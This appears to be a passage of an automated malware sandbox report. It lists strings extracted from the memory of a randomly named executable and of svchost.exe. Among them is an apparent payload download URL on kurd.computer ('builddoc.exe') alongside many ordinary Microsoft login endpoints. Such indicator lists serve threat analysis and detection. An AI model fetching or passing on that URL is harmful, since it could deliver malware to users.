Source: c12YwoiQ34lE0LgBRkxJOClX.exe, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/dll/builddoc.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/dll/builddoc.exe0
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/dll/builddoc.exep
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478377141.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457084497.00000000043CA000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1426618374.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1420648647.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1419328721.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1413612501.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1453551457.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1457040379.00000000043C7000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1421794459.00000000043C0000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414955708.00000000043C9000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1450196885.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1429282984.00000000043C4000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1452926000.00000000043C0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer/dll/builddoc.exex_
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1478565059.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1460930555.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1479265140.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer:80/dll/builddoc.exe
Source: c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1414376401.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp, c12YwoiQ34lE0LgBRkxJOClX.exe, 00000013.00000003.1417160480.0000000002ADE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://kurd.computer:80/dll/builddoc.exe)x
Source: svchost.exe, 00000034.00000003.1977042587.000001F4D9655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1553593331.000001F4D86EF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srfsrf
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srfrf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1977042587.000001F4D9655000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2853548341.000001F4D96A3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/RST2.srf$
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/didtou.srfice
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srfen
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srfuer
Source: svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000034.00000003.1518831614.000001F4D8F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-Dt
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600UE
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000034.00000003.1376226492.000001F4D8F6B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfn
Source: svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=805021
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502R
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806043
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376112342.000001F4D8F57000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000034.00000003.1361507616.000001F4D8F5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp8
Source: svchost.exe, 00000034.00000003.1368388814.000001F4D8F52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379663960.000001F4D8F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1379570012.000001F4D8F56000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000034.00000002.2848602818.000001F4D9613000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srff
Source: svchost.exe, 00000034.00000002.2716257953.000001F4D865F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000034.00000003.1376014120.000001F4D8F4D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376175268.000001F4D8F63000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srfLive
Source: svchost.exe, 00000034.00000002.2706314891.000001F4D8647000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 00000034.00000003.1376055788.000001F4D8F3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000034.00000003.1376151258.000001F4D8F40000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/resetpw.srf.srf
